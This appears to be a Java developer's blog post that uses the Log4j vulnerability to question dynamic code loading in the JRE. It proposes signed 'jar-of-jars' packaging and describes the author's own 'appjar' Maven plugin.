Since last week everyone in the Java developer community has been stumbling over themselves because of the Log4j vulnerability. Once word got out, the log4j maintainers quickly released a fix. So if you were fairly up to date, all you had to do was upgrade a dependency and redeploy. (My project was still using log4j 1.x, so it took just a tad more effort, but that is on me.) Unless you were of course one of the people who were actually using the functionality used by the exploit, but I wager chances are small that is the case.
What I have been pondering about is if the root cause of the vulnerability is in essence really a log4j issue. Yes, log4j made it easily accessible, but the core of the issue is the fact that the JRE is completely based on dynamically loading executable code. It does so via the JNDI method which is used in the log4j vulnerability, but also simply because classes are always loaded from the file system for all Java applications. Basically moving all security constraints onto the system it runs on.
Java is a -let’s call it- ‘mature’ platform, and about a decade ago it seemed like a good idea to be able to load code dynamically from external locations. And when diskspace was a premium it also was a good idea to have shared libraries only present once. But nowadays diskspace is cheap and security is much more of a concern. So it is important to minimize the vectors via which malicious software can enter the system. One of the ways to do that is to make sure that what you create at build time can’t be tampered with. So no dynamical loading, but at build time put everything in one signed file. Just like web development nowadays does with tools like webpack.
Java already has the concept of signed jars. And also fat/uber jars have existed for a long time, where all class and resources files are merged into a single jar. The maven assembly or shade plugin can be used to create such jars. But fat/uber jars have a few drawbacks, most notably the fact that if any of the merged jars contain the same files (I’m looking at you, MANIFEST.MF), they will overwrite each other and only one will remain. That can cause many problems. Merging those files is not an easy feat.
The better alternative would be to not unpack the jars, but simply collect them all into a new jar: a jar-of-jars. Nothing is unpacked or overwritten. When starting such a jar-of-jars, the classloaders can -and should- only load from this jar. Everything your need wrapped into a easily distributable package. Put a bow on it (sign it) and you’re all done.
Of course it already is an option to use things like Graalvm, but that put limitations on the Java code. A jar-of-jars only puts some restrictions on the classloader, not on the coder. Naturally there still a temp folder needed, so things like webapplications can still do their code generation logic, but the JRE could provide for that by presenting an encrypted tmp folder. And maybe containers can be used to archief something similar, but will make the solution complex quickly.
I’ve tried writing such a jar-of-jars myself, but the fact that the Java classloader cannot load from a jar inside another jar kinda ruins the idea. My “appjar” maven plugin creates a jar-of-jars, with a small embedded Java class that upon start unpacks the jar-of-jars into a temp directory and then spawns a new JRE. The bootstrap JRE stays behind, waiting for the spawned JRE to stop, so it can delete the temp directory.
The appjar works fairly well, but it would be much better to have formal support for a jar-of-jars in the JRE.